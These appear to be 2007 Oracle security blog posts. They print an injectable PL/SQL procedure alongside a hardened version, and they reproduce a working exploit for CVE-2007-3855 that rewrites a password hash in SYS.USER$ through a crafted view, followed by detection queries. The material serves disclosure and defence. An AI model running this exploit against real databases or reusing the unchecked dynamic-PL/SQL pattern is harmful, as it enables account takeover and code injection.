Partnership between Red-Database-Security GmbH and PeteFinnigan.com Ltd.

August 21st, 2007

Red-Database-Security GmbH in Germany and PeteFinnigan.com Limited in the UK are pleased to announce an exclusive partnership to promote and sell services, training and products that give customers the best choices in securing Oracle databases. Pete Finnigan and Alex Kornbrust are both world leaders in the field of securing Oracle databases, and this exclusive partnership will provide a stronger combined proposition for customers of both companies. Alex and Pete are also pleased to announce an exclusive and exciting limited opportunity to attend a 5-day Oracle Anti Hacker training in London from October 29th to November 2nd. Places are limited, so don't miss this unique opportunity. See www.petefinnigan.com and www.red-database-security.com for more details and to register.

David’s Whitepaper about Oracle Forensics

August 12th, 2007

David Litchfield has just released the 5th part of his Oracle Forensics whitepaper series, "Finding Evidence of Data Theft in the Absence of Auditing". It describes how to find traces of an attacker even when that attacker used only SELECT statements, i.e. when no DML and no audit records are available.

Oracle 11g is available

August 10th, 2007

Oracle 11g is now available for download (Linux only so far).

Best (insecure) Practice PL/SQL on OTN

July 31st, 2007

You already know that I like to analyze other people's code. On OTN I found a nice article (the most popular developer article), "Best Practice PL/SQL" by Steven Feuerstein (http://www.oracle.com/technology/pub/columns/plsql/index.html).
Steven Feuerstein is a well-known expert on the Oracle PL/SQL language. His disclaimer says: "Do not take the advice and recommendations herein at face value. You should always build yourself a test case and run it on your database, for your schema, on your computer." That is fine, but even (or especially) sample code should be secure. A disclaimer is a simple solution but not a good one, especially if the code is posted as "Best Practice".

The article offers some PL/SQL sample code for download, e.g. str2list, which is described as follows:
"The str2list package accepts your string, delimiter, and the name of your package-based collection. It deposits the parsed items in your string directly into your collection. The collection can either be declared in the package specification (publicly accessible) or you can define it in the package body and then provide procedures to add to and delete from the collection. These will be called by str2list to populate the collection properly. It's a useful utility as well as a great example of dynamic PL/SQL block execution."
As always, the same problem: no input validation in some of the procedures (e.g. showlist or parse). The caller-supplied names are concatenated into an anonymous PL/SQL block that is then executed, so whoever controls those parameters can run arbitrary PL/SQL code. PL/SQL injection is more severe than SQL injection, because the attacker gets a full procedural language with all the privileges of the executing user, not just a query. I know that writing secure code takes time, but I think it is worth doing, especially for sample code that is used by many people. Just adding a disclaimer is, in my opinion, not the right way to deal with vulnerabilities.

A quick analysis of str2list.pkg (source from March 2005) shows the following vulnerable code. Every parameter (pkg, firstrowproc, nextrowproc, getvalfunc, showproc and datatype) goes unchecked into dynblock:

—————— str2list.pkg ————————————————————
PROCEDURE showlist (
   pkg            IN   VARCHAR2,
   firstrowproc   IN   VARCHAR2,
   nextrowproc    IN   VARCHAR2,
   getvalfunc     IN   VARCHAR2,
   showproc       IN   VARCHAR2 := 'pl',
   datatype       IN   VARCHAR2 := 'VARCHAR2(32767)'
)
IS
   dynblock   VARCHAR2 (32767);
BEGIN
   dynblock :=
         'DECLARE
             indx PLS_INTEGER := '
      || pkg
      || '.'
      || firstrowproc
      || ';
             v_startloc PLS_INTEGER := 1;
             v_item '
      || datatype
      || ';
          BEGIN
             LOOP
                EXIT WHEN indx IS NULL;'
      || showproc
      || ' ('
      || pkg
      || '.'
      || getvalfunc
      || '(indx));
                indx := '
      || pkg
      || '.'
      || nextrowproc
      || '(indx);
             END LOOP;
          END;';
   EXECUTE IMMEDIATE dynblock;
EXCEPTION
   WHEN OTHERS
   THEN
      disperr (dynblock);
END;
—————— str2list.pkg ————————————————————
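For comparison, here is how the same procedure looks once every caller-supplied name is validated before it is concatenated. This is an added example written for this post, not code from Steven Feuerstein's str2list package. It assumes Oracle 10gR2 or later (for DBMS_ASSERT) and that the helper procedures pl and disperr from the original package exist; the name showlist_safe is made up for the example.

```sql
-- Added example (not part of the str2list package): a hardened SHOWLIST.
-- Assumes Oracle 10gR2+ (SYS.DBMS_ASSERT) and the original helpers PL and
-- DISPERR. Every string that ends up inside the dynamic block is either a
-- validated copy of the input or a whitelisted literal.
CREATE OR REPLACE PROCEDURE showlist_safe (
   pkg            IN   VARCHAR2,
   firstrowproc   IN   VARCHAR2,
   nextrowproc    IN   VARCHAR2,
   getvalfunc     IN   VARCHAR2,
   showproc       IN   VARCHAR2 := 'pl',
   datatype       IN   VARCHAR2 := 'VARCHAR2(32767)'
)
IS
   dynblock     VARCHAR2 (32767);
   v_pkg        VARCHAR2 (200);
   v_showproc   VARCHAR2 (200);
   v_first      VARCHAR2 (200);
   v_next       VARCHAR2 (200);
   v_get        VARCHAR2 (200);
BEGIN
   -- 1. Names that must be existing schema objects: the package and the
   --    display procedure. SQL_OBJECT_NAME resolves the (optionally
   --    schema-qualified) name and raises ORA-44002 "invalid object name"
   --    for anything else, including 'x; EXECUTE IMMEDIATE ...'.
   v_pkg      := SYS.DBMS_ASSERT.SQL_OBJECT_NAME (pkg);
   v_showproc := SYS.DBMS_ASSERT.SQL_OBJECT_NAME (showproc);

   -- 2. Packaged subprograms are not schema objects, so they can only be
   --    checked syntactically: SIMPLE_SQL_NAME accepts exactly one SQL
   --    identifier (plain or double-quoted) and raises ORA-44003 "invalid
   --    SQL name" otherwise. A double-quoted value such as "a; b" passes,
   --    but inside the block it is still just an identifier, not code.
   v_first := SYS.DBMS_ASSERT.SIMPLE_SQL_NAME (firstrowproc);
   v_next  := SYS.DBMS_ASSERT.SIMPLE_SQL_NAME (nextrowproc);
   v_get   := SYS.DBMS_ASSERT.SIMPLE_SQL_NAME (getvalfunc);

   -- 3. A data type is neither an object nor an identifier, so DBMS_ASSERT
   --    cannot help. Accept only a fixed whitelist of spellings.
   IF NOT REGEXP_LIKE (
             datatype,
             '^(VARCHAR2\([0-9]{1,5}\)|NUMBER|INTEGER|PLS_INTEGER|DATE)$',
             'i')
   THEN
      RAISE_APPLICATION_ERROR (-20001,
                               'showlist_safe: unsupported datatype');
   END IF;

   -- Same block as the original (minus the unused v_startloc), built only
   -- from the validated copies.
   dynblock :=
         'DECLARE
             indx PLS_INTEGER := ' || v_pkg || '.' || v_first || ';
             v_item ' || datatype || ';
          BEGIN
             LOOP
                EXIT WHEN indx IS NULL;
                ' || v_showproc || ' (' || v_pkg || '.' || v_get || ' (indx));
                indx := ' || v_pkg || '.' || v_next || ' (indx);
             END LOOP;
          END;';
   EXECUTE IMMEDIATE dynblock;
EXCEPTION
   WHEN OTHERS
   THEN
      -- Do not swallow validation failures: if dynblock was never built,
      -- one of the DBMS_ASSERT checks fired, which is exactly what a
      -- caller (or an auditor) needs to see.
      IF dynblock IS NULL
      THEN
         RAISE;
      END IF;
      disperr (dynblock);
END showlist_safe;
/
```

Two caveats. First, the checks must live in the same procedure that builds the block; validating in a wrapper and then passing the raw strings on achieves nothing. Second, DBMS_ASSERT stops code injection but not misuse: a caller can still name any package and procedure the executing user has EXECUTE on. The real fix for a utility like this is to pass the collection as a typed parameter (a nested table or associative array) instead of passing procedure names as strings, so that there is no dynamic code at all.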

Exploit for Create View Problem published

July 22nd, 2007

Andrea Purificato has published an exploit for the Create-View problem (DB17, aka CVE-2007-3855, a bug found by Red-Database-Security). The issue was fixed with the July 2007 CPU.

The exploit updates the password hash in SYS.USER$ via a specially crafted view. Andrea's exploit does not work without an additional step, however, because changing password hashes with a plain UPDATE is not supported: the instance keeps the USER$ entry in its dictionary cache, so a login still checks the old hash until the database has been restarted, as the example below shows.

Example:

-- We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

-- Now we connect to the database and update the password hash via a specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
  2  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;

View created.
SQL> update cpu.bunkerview set password='7B843A192FF96BE9' where name ='RDS';

1 row updated.

SQL> commit;

Commit complete.

-- The hash stored in SYS.USER$ is now the one for HACKED.

SQL> select password from sys.user$ where name='RDS';

PASSWORD
------------------------------
7B843A192FF96BE9

-- But the connect attempt still fails with an error message...
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

-- To activate the password change it is necessary to restart the database. After the restart the login succeeds:

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>
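The exploit leaves an artefact behind: a view in a non-SYS schema that reads SYS.USER$ (bunkerview in the schema cpu above). The following queries are an added example written for this post, not part of Andrea's exploit or of the advisory; they assume a DBA account, since they read DBA_DEPENDENCIES and DBA_TAB_PRIVS.

```sql
-- Added example (not from the exploit or the advisory): two checks for
-- traces of the Create-View attack on a 10g database. Run as a DBA.

-- 1. Views outside SYS/SYSTEM that depend directly on SYS.USER$.
--    The exploit's CPU.BUNKERVIEW would appear here as long as it exists.
SELECT d.owner, d.name AS view_name
  FROM dba_dependencies d
 WHERE d.type             = 'VIEW'
   AND d.referenced_owner = 'SYS'
   AND d.referenced_name  = 'USER$'
   AND d.owner NOT IN ('SYS', 'SYSTEM')
 ORDER BY d.owner, d.name;

-- 2. Object privileges granted on SYS.USER$ to anybody but SYS.
--    Any row here is unusual on a default installation and needs an
--    explanation; a grant with GRANTABLE = 'YES' even more so.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'USER$'
 ORDER BY grantee, privilege;
```

A view that has already been dropped will not show up in the first query; in that case only the audit trail, or the approach from David Litchfield's Oracle Forensics papers mentioned above, can still reveal what happened. Note also that the hash changed by the exploit is indistinguishable from a legitimate one once it is in SYS.USER$, so the view and the grants are the things worth looking for.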